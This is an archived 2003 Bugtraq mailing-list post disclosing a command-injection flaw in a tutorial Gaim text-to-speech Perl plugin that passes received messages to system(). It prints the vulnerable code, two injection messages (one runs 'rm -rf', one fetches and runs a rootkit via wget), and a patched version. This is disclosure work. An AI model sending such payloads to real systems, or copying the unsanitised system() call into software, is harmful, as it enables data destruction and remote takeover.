[32075] in bugtraq
Gaim festival plugin exploit
daemon@ATHENA.MIT.EDU (error)
Wed Oct 15 13:52:54 2003
From: error <error@lostinthenoise.net>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-SJnf289US2tER+Apu46V"
Message-Id: <1066231795.759.179.camel@localhost>
Mime-Version: 1.0
Date: 15 Oct 2003 17:29:55 +0200
--=-SJnf289US2tER+Apu46V
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
It has come to my attention that people have actually used this example
code for a gaim plugin:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string =3D $_[0];
$string =3D~ s/\<.*?\>//g;
$string =3D~ s/\".*\"//;
system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
This has to be one of the most amusing ways to gain a local users
privileges I have ever seen by an "Expert (TM)"
Exploit code?
You have a shell through gaim with that.
Just pass it this message (or really any message for that matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Or perhaps:
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
rootkit;./rootkit
Perhaps someone should ask:
"(Is s/[^\w]//g really that hard to do?!)"
So a fixed version would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string =3D $_[0];
$string =3D~ s/\<.*?\>//g;
$string =3D~ s/\".*\"//;
$string =3D~ s/[^\w]//g;
system("echo \"$string\" | /usr/bin/festival --tts");
}
Just a minor comment, nothing special.
--=20
error <error@lostinthenoise.net>
--=-SJnf289US2tER+Apu46V
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
iD4DBQA/jWfzKvrsP0edi7gRAh4CAJjjIs/L2Qv0Gx6lW8Gcn351fsUbAJ4pBjD9
+kNzH+w9sXBX4i08s4sqeA==
=/5rw
-----END PGP SIGNATURE-----
--=-SJnf289US2tER+Apu46V--
